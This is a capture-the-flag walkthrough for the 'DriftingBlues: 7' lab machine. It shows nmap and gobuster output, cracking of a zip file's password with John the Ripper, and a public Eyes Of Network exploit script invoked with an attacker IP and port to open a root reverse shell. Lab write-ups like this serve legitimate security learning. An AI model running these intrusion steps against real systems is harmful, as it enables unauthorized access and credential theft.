Box info:
Name: DriftingBlues: 7
OS: Linux
Rated Difficulty: 🟩🟩(easy)
====================================================================
Nmap has found 8 open ports by doing a full port scan:
$ nmap -p22,66,80,111,443,2403,3306,8086 -sC -sV 192.168.0.85 Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 17:48 EEST Nmap scan report for 192.168.0.85 Host is up (0.00076s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 c4:fa:e5:5f:88:c1:a1:f0:51:8b:ae:e3:fb:c1:27:72 (RSA) | 256 01:97:8b:bf:ad:ba:5c:78:a7:45:90:a1:0a:63:fc:21 (ECDSA) |_ 256 45:28:39:e0:1b:a8:85:e0:c0:b0:fa:1f:00:8c:5e:d1 (ED25519) 66/tcp open http SimpleHTTPServer 0.6 (Python 2.7.5) |_http-server-header: SimpleHTTP/0.6 Python/2.7.5 |_http-title: Scalable Cost Effective Cloud Storage for Developers 80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 ) |_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 |_http-title: Did not follow redirect to https://192.168.0.85/ 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind |_ 100000 3,4 111/udp6 rpcbind 443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 ) |_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 | http-title: EyesOfNetwork |_Requested resource was /login.php## | ssl-cert: Subject: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2021-04-03T14:37:22 |_Not valid after: 2022-04-03T14:37:22 |_ssl-date: TLS randomness does not represent time 2403/tcp open taskmaster2000? 3306/tcp open mysql MariaDB (unauthorized) 8086/tcp open http InfluxDB http admin 1.7.9 |_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Checking port 66 which is a website:
Gobuster result for port 66:
$ gobuster dir -u http://192.168.0.85:66/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt /user.txt (Status: 200) /root.txt (Status: 200) /index_files (Status: 301) /eon
The only interesting directory is /eon. If we access it, a file will be downloaded:
We'll use JohnTheRipper to find the password for the zip file that we just downloaded:
First use zip2john to create a hash from the zip file:
$ /usr/sbin/zip2john application.zip > hash
Now we can use john to crack the hash:
$ sudo john -wordlist=/usr/share/wordlists/rockyou.txt hash Password: k[redacted]
Now we can extract the content of the zip file which will be a file named creds.txt:
username: admin password: is[redacted]
Using the credentials that we've found we'll move to the next port: port 80 which will redirect us to port 443 when accessed.
After some research I've found this exploit for Eyes Of Network: https://github.com/h4knet/eonrce
From that github repository we'll use eonrce.py like this:
$ ./eonrce.py https://<MACHINE IP>/ -user admin -password 'is[redacted]' -ip <YOUR IP> -port <PORT>
Now if we execute the above script, we'll get a reverse shell on the box as root.
Comments
Post a Comment